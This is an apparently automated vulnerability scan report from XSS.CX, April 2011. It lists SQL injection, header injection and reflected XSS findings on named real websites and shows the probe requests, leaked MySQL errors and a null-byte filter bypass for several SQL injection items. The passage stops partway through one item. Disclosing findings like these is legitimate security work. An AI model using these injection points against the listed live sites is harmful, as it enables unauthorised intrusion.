XSS, SQL Injection, HTTP Header Injection, CWE-79, CWE-89, CWE-113, DORK Report April 20, 2011

The DORK Report for April 20, 2011 | GHDB | Vulnerable Hosts | DORK Search

Report generated by XSS.CX at Wed Apr 20 09:46:25 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. SQL injection

1.1. http://www.bizfind.us/cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx [REST URL parameter 5]

1.2. http://www.caribbean-ocean.com/get-image.php [id parameter]

1.3. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

1.4. http://www.insideup.com/wiki/index.php [action parameter]

1.5. http://www.insideup.com/wiki/index.php [title parameter]

1.6. http://www.nutter.com/careers.php [CategoryID parameter]

1.7. http://www.regonline.com/Register/Checkin.aspx [ASP.NET_SessionId cookie]

1.8. https://www.regonline.com/Register/WebResource.axd [CurrentROLSession cookie]

2. HTTP header injection

2.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]

2.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]

2.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.2. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.3. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.4. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.5. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.6. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.7. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.8. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 2]

3.9. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 3]

3.10. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 4]

3.11. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 5]

3.12. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 6]

3.13. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 7]

3.14. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 2]

3.15. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 3]

3.16. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 4]

3.17. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 5]

3.18. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 6]

3.19. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 7]

3.20. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 2]

3.21. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 3]

3.22. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 4]

3.23. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 5]

3.24. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 6]

3.25. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 7]

3.26. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]

3.27. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]

3.28. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]

3.29. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 2]

3.30. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]

3.31. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 1]

3.32. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 2]

3.33. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 5]

3.34. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 1]

3.35. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 2]

3.36. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 5]

3.37. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 1]

3.38. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 2]

3.39. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 4]

3.40. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 1]

3.41. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 2]

3.42. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 6]

3.43. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 1]

3.44. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 2]

3.45. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 5]

3.46. http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js [REST URL parameter 1]

3.47. http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js [REST URL parameter 3]

3.48. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 2]

3.49. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 3]

3.50. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 4]

3.51. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]

3.52. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [name of an arbitrarily supplied request parameter]

3.53. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 2]

3.54. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 3]

3.55. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 4]

3.56. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]

3.57. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [name of an arbitrarily supplied request parameter]

3.58. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 2]

3.59. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 3]

3.60. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 4]

3.61. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]

3.62. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [name of an arbitrarily supplied request parameter]

3.63. http://flash.quantserve.com/quant.swf [lc parameter]

3.64. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]

3.65. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]

3.66. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]

3.67. http://pastebin.com/74KXCaEZ [REST URL parameter 1]

3.68. http://pastebin.com/74KXCaEZ [name of an arbitrarily supplied request parameter]

3.69. http://pastebin.com/CvGXyfiJ [REST URL parameter 1]

3.70. http://pastebin.com/CvGXyfiJ [name of an arbitrarily supplied request parameter]

3.71. http://pastebin.com/DBDqm6Km [REST URL parameter 1]

3.72. http://pastebin.com/DBDqm6Km [name of an arbitrarily supplied request parameter]

3.73. http://pastebin.com/X8znzPWH [REST URL parameter 1]

3.74. http://pastebin.com/X8znzPWH [name of an arbitrarily supplied request parameter]

3.75. http://pastebin.com/u/ComodoHacker [REST URL parameter 1]

3.76. http://pixel.adsafeprotected.com/jspix [advId parameter]

3.77. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.78. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.79. http://pixel.adsafeprotected.com/jspix [chanId parameter]

3.80. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.81. http://pixel.adsafeprotected.com/jspix [placementId parameter]

3.82. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.83. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.84. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.85. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.86. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.87. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.88. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.89. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.90. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.91. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [awesm parameter]

3.92. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [name of an arbitrarily supplied request parameter]

3.93. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_content parameter]

3.94. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_medium parameter]

3.95. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_source parameter]

3.96. http://uboat.net/favicon.ico [REST URL parameter 1]

3.97. http://uboat.net/favicon.ico [REST URL parameter 1]

3.98. http://uboat.net/history/wwi/ [REST URL parameter 1]

3.99. http://uboat.net/history/wwi/ [REST URL parameter 1]

3.100. http://uboat.net/history/wwi/ [REST URL parameter 2]

3.101. http://uboat.net/history/wwi/ [REST URL parameter 2]

3.102. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 2]

3.103. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 3]

3.104. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [name of an arbitrarily supplied request parameter]

3.105. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 1]

3.106. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 2]

3.107. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [name of an arbitrarily supplied request parameter]

3.108. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 1]

3.109. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 2]

3.110. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [name of an arbitrarily supplied request parameter]

3.111. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

3.112. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

3.113. http://www.barracudanetworks.com/ns/company/ [name of an arbitrarily supplied request parameter]

3.114. http://www.barracudanetworks.com/ns/products/ [name of an arbitrarily supplied request parameter]

3.115. http://www.barracudanetworks.com/ns/products/index.php [name of an arbitrarily supplied request parameter]

3.116. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php [name of an arbitrarily supplied request parameter]

3.117. http://www.barracudanetworks.com/ns/products/spam_overview.php [name of an arbitrarily supplied request parameter]

3.118. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php [name of an arbitrarily supplied request parameter]

3.119. http://www.barracudanetworks.com/ns/purchase/ [name of an arbitrarily supplied request parameter]

3.120. https://www.barracudanetworks.com/ns/products/request_eval_unit.php [name of an arbitrarily supplied request parameter]

3.121. http://www.bizfind.us/Index.asp [name of an arbitrarily supplied request parameter]

3.122. http://www.bizfind.us/impressum.asp [name of an arbitrarily supplied request parameter]

3.123. http://www.bizfind.us/privacy.asp [name of an arbitrarily supplied request parameter]

3.124. http://www.bizfind.us/pubblicita.asp [name of an arbitrarily supplied request parameter]

3.125. http://www.bizfind.us/search.asp [cerca parameter]

3.126. http://www.bizfind.us/search.asp [cerco parameter]

3.127. http://www.bizfind.us/sitemap.asp [name of an arbitrarily supplied request parameter]

3.128. http://www.briangardner.com/ [name of an arbitrarily supplied request parameter]

3.129. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]

3.130. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]

3.131. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]

3.132. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]

3.133. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]

3.134. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]

3.135. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif [REST URL parameter 2]

3.136. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif [REST URL parameter 3]

3.137. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg [REST URL parameter 2]

3.138. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg [REST URL parameter 3]

3.139. http://www.caribbean-ocean.com/enq.php/stylesheet.css [REST URL parameter 2]

3.140. http://www.caribbean-ocean.com/get-image.php [id parameter]

3.141. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

3.142. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]

3.143. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]

3.144. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]

3.145. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]

3.146. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]

3.147. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]

3.148. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif [REST URL parameter 2]

3.149. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif [REST URL parameter 3]

3.150. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg [REST URL parameter 2]

3.151. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg [REST URL parameter 3]

3.152. http://www.caribbean-ocean.com/get-in-touch.php/stylesheet.css [REST URL parameter 2]

3.153. http://www.digitalbond.com/2008/07/20/managing-your-security-career/ [REST URL parameter 4]

3.154. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 1]

3.155. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 2]

3.156. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 3]

3.157. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 4]

3.158. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 5]

3.159. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 6]

3.160. http://www.insideup.com/forgotPassword.html [username parameter]

3.161. http://www.insideup.com/login.html [password parameter]

3.162. http://www.insideup.com/login.html [username parameter]

3.163. http://www.insideup.com/updateCity.html [city parameter]

3.164. http://www.insideup.com/wiki/index.php [action parameter]

3.165. http://www.insideup.com/wiki/index.php [action parameter]

3.166. http://www.jotform.com/favicon.ico [REST URL parameter 1]

3.167. http://www.jotform.com/form/2910946098 [REST URL parameter 1]

3.168. http://www.lesechos.fr/investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htm [REST URL parameter 3]

3.169. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.170. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.171. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

3.172. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

3.173. http://www.nutter.com/attorneys.php [AttorneyID parameter]

3.174. http://www.nutter.com/careers.php [CategoryID parameter]

3.175. http://www.southparkstudios.com/ [name of an arbitrarily supplied request parameter]

3.176. http://www.southparkstudios.com//feeds/twitter_search/query/cart.mn/ [REST URL parameter 1]

3.177. http://www.southparkstudios.com//feeds/twitter_search/query/cart.mn/ [REST URL parameter 2]

3.178. http://www.southparkstudios.com/account/login [REST URL parameter 1]

3.179. http://www.southparkstudios.com/account/login [REST URL parameter 2]

3.180. http://www.southparkstudios.com/account/login [name of an arbitrarily supplied request parameter]

3.181. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 1]

3.182. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 2]

3.183. http://www.southparkstudios.com/favicon.ico [REST URL parameter 1]

3.184. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 1]

3.185. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 2]

3.186. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 3]

3.187. http://www.southparkstudios.com/forum/ucp.php [REST URL parameter 1]

3.188. http://www.southparkstudios.com/gsp/shared/homepage/banners/quotes/0309-quote-moses-macaroni-pictures.swf [REST URL parameter 1]

3.189. http://www.southparkstudios.com/guide/episodes/ [REST URL parameter 1]

3.190. http://www.southparkstudios.com/guide/episodes/ [REST URL parameter 2]

3.191. http://www.southparkstudios.com/guide/episodes/ [name of an arbitrarily supplied request parameter]

3.192. http://www.southparkstudios.com/poll [REST URL parameter 1]

3.193. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.194. http://www.insideup.com/login.html [Referer HTTP header]

3.195. http://www.insideup.com/login.html [Referer HTTP header]



1. SQL injection  next
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.



1.1. http://www.bizfind.us/cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx [REST URL parameter 5]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 1668
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:13 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>NETSPARKER3FCA331E008F470991BCA348524BAFEB' popular categories
...[SNIP]...

Request 2

GET /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx'' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78135
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:15 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>NETSPARKER3FCA331E008F470991BCA348524BAFEB'' popular categorie
...[SNIP]...

1.2. http://www.caribbean-ocean.com/get-image.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /get-image.php?id=52652' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:17:55 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 934
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

1.3. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /get-image.php?id=5/1'2652 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:19:12 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 940
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'2652' at line 1<br /><br /><textarea rows="10" cols="100"
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

1.4. http://www.insideup.com/wiki/index.php [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /wiki/index.php

Issue detail

The action parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the action parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /wiki/index.php?title=-&action=raw'&gen=js&useskin=monobook HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.insideup.com
Cookie: OAID=5970e1167121a2363c810f601c8e5f51; PHPSESSID=7o85u69j279gjuu7r5rl5e0lu6

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:45:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
           FROM category cat, sub_category subcat
                                   WHERE cat.category_id = subcat.category_id
                                   AND LOWER(subcat.sub_category_name) = 'index.php?title=-&action=raw'&gen=js&useskin=monobook' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5

1.5. http://www.insideup.com/wiki/index.php [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /wiki/index.php

Issue detail

The title parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the title parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /wiki/index.php?title=MediaWiki:Monobook.css%00'&usemsgcache=yes&action=raw&ctype=text/css&smaxage=18000 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.insideup.com
Cookie: OAID=5970e1167121a2363c810f601c8e5f51; PHPSESSID=7o85u69j279gjuu7r5rl5e0lu6

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:44:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
                               WHERE cat.category_id = subcat.category_id
                                   AND LOWER(subcat.sub_category_name) = 'index.php?title=mediawiki:monobook.css%00'&usemsgcache=yes&action=raw&ctype=text/css&smaxage=18000' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5

1.6. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

